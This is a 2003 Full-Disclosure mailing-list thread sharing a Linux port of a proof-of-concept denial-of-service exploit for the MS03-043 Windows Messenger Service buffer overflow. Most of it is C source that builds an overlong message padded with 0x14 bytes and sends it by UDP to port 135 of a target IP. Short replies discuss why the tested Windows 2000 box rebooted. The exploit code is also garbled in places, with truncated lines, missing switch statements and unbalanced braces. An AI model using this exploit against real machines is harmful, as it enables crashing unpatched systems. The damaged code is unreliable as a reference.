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Re: [Full-Disclosure] Linux Ported Version of MS03-043 DOS

The box I sent a screenshot of is a default install Windows 2000 Advanced Server without the 043 patch, there was no tweaking of the service recovery steps:

I am kind of confused as to what you are asking, are you suggesting that it shouldn't reboot due to the DOS by default? Or it should and you were wondering if he had disabled the recovery steps and it crashed anyway?

Dowling, Gabrielle wrote:

Then I don't understand what you're talking about? You have a win2k system that you haven't patched in ages and it rebooted when you threw. an exploit against it?

My initial query was because the messenger service has an rpc service that I'm not fully familiar with, buti would expect it to behave in accordance with rpc in general, which on win2k is to do nothing, rather than reboot.

If the exploit is somehow causing a reboot apart from rpc service default behavior (which can be changed) it would be good to learn how.


-----Original Message-----
From:   VeNoMouS [mailto:venom@gen-x.co.nz]
Sent:   Mon Oct 20 00:34:53 2003
To:     Dowling, Gabrielle; full-disclosure@lists.netsys.com
Subject:        Re: [Full-Disclosure] Linux Ported Version of MS03-043 DOS

to tell u the true, i ant a wintendo whore, i just applied patches ages ago,
but basicly what i got was the popup box up with your box is rebooting in 59
seconds crap, im not a wintendo admin, nor do i calim to be im only a *nix
coder && admin.

----- Original Message ----- From: "Dowling, Gabrielle" <dowlingg@sullcrom.com>
To: "VeNoMouS" <venom@gen-x.co.nz>; <full-disclosure@lists.netsys.com>
Sent: Monday, October 20, 2003 5:28 PM
Subject: RE: [Full-Disclosure] Linux Ported Version of MS03-043 DOS

Was the win2k system you tested on set to have the rpc service reboot on fail, or was the reboot caused by some other oddity?


-----Original Message-----
From: VeNoMouS [mailto:venom@gen-x.co.nz]
Sent: Sun Oct 19 22:22:51 2003
To: full-disclosure@lists.netsys.com
Subject: [Full-Disclosure] Linux Ported Version of MS03-043 DOS

Here you go guys or get it via www.gen-x.co.nz/ms03-043.c

<<<<<<<<<<<<<<<<<< SNIP >>>>>>>>>>>>>>>>>>>>>>>>

Mon Oct 20 14:26:55 NZDT 2003

Re-written By VeNoMouS to be ported to linux, and tidy it up a little.
This was only like a 5 minute port but it works and has been tested.

greets to str0ke and defy

DoS Proof of Concept for MS03-043 - exploitation shouldn't be too hard. Launching it one or two times against the target should make the machine reboot. Tested against a Win2K SP4.

"The vulnerability results because the Messenger Service does not
properly validate the length of a message before passing it to the allocated
buffer" according to MS bulletin. Digging into it a bit more, we find that

a character 0x14 in encountered in the 'body' part of the message, it is
replaced by a CR+LF. The buffer allocated for this operation is twice the
of the string, which is the way to go, but is then copied to a buffer which
was only allocated 11CAh bytes. Thanks to that, we can bypass the length

and overflow the fixed size buffer.

Credits go to LSD :)


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <time.h>

#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>

// Packet format found thanks to a bit a sniffing
static unsigned char packet_header[] =
"\xff\xff\xff\xff" // @40 : unique id over 16 bytes ?
"\xff\xff\xff\xff" // @74 : fields length

unsigned char field_header[] =
"\xff\xff\xff\xff" // @0 : field length
"\xff\xff\xff\xff"; // @8 : field length

int usage(char *name) { printf("Proof of Concept for Windows Messenger Service Overflow..\n"); printf("- Originally By Hanabishi Recca - recca@mail.ru\n\n"); printf("- Ported to linux by VeNoMouS..\n"); printf("- venom@gen-x.co.nz\n\n\n");

printf("example : %s -d yourputtersux -i -s
printf("\n-d <dest netbios name>\t-i <dest netbios ip>\n");
printf("-s <src netbios name>\n");
return 1;

int main(int argc,char *argv[]) { int i, packet_size, fields_size, s; unsigned char packet[8192]; struct sockaddr_in addr; char from[57],machine[57],c; char body[4096] = "*** MESSAGE ***";

 if(argc <= 2)

   while ((c = getopt (argc, argv, "d:i:s:h")) != EOF)
  case 'd':
     printf("Machine is %s\n",machine);
  case 'i':
           memset(&addr, 0,sizeof(addr));
           addr.sin_family = AF_INET;
           addr.sin_addr.s_addr = inet_addr(optarg);
           addr.sin_port = htons(135);
  case 's':

  case 'h':

       // A few conditions :
       // 0 <= strlen(from) + strlen(machine) <= 56
       // max fields size 3992

 if(!addr.sin_addr.s_addr) { printf("Ummm MOFO we need a dest IP...\n");
exit(0); }

       if(!strlen(machine)) { printf("Ummmm we also need the dest netbios
name bro...\n"); exit(0); }

if(!strlen(from)) strcpy(from,"tolazytotype");

       memset(packet,0, sizeof(packet));
       packet_size = 0;

       memcpy(&packet[packet_size], packet_header, sizeof(packet_header) -
       packet_size += sizeof(packet_header) - 1;

       i = strlen(from) + 1;
       *(unsigned int *)(&field_header[0]) = i;
       *(unsigned int *)(&field_header[8]) = i;
       memcpy(&packet[packet_size], field_header, sizeof(field_header) -
       packet_size += sizeof(field_header) - 1;
       strcpy(&packet[packet_size], from);
       packet_size += (((i - 1) >> 2) + 1) << 2; // padded to a multiple of

       i = strlen(machine) + 1;
       *(unsigned int *)(&field_header[0]) = i;
       *(unsigned int *)(&field_header[8]) = i;
       memcpy(&packet[packet_size], field_header, sizeof(field_header) -
       packet_size += sizeof(field_header) - 1;
       strcpy(&packet[packet_size], machine);
       packet_size += (((i - 1) >> 2) + 1) << 2; // padded to a multiple of

       fprintf(stdout, "Max 'body' size (incl. terminal NULL char) = %d\n",
3992 - packet_size + sizeof(packet_header) - sizeof(field_header));
       memset(body, 0x14, sizeof(body));
       body[3992 - packet_size + sizeof(packet_header) -
sizeof(field_header) - 1] = '\0';

       i = strlen(body) + 1;
       *(unsigned int *)(&field_header[0]) = i;
       *(unsigned int *)(&field_header[8]) = i;
       memcpy(&packet[packet_size], field_header, sizeof(field_header) -
       packet_size += sizeof(field_header) - 1;
       strcpy(&packet[packet_size], body);
       packet_size += i;

       fields_size = packet_size - (sizeof(packet_header) - 1);
       *(unsigned int *)(&packet[40]) = time(NULL);
       *(unsigned int *)(&packet[74]) = fields_size;

       fprintf(stdout, "Total length of strings = %d\nPacket size =
%d\nFields size = %d\n", strlen(from) + strlen(machine) +
strlen(body),packet_size, fields_size);

if ((s = socket (AF_INET, SOCK_DGRAM, 0)) == -1 ) { perror("Error socket() - "); exit(0); }

       if (sendto(s, packet, packet_size, 0, (struct sockaddr *)&addr,
sizeof(addr)) == -1)
  perror("Error sendto() - ");

exit(0); }

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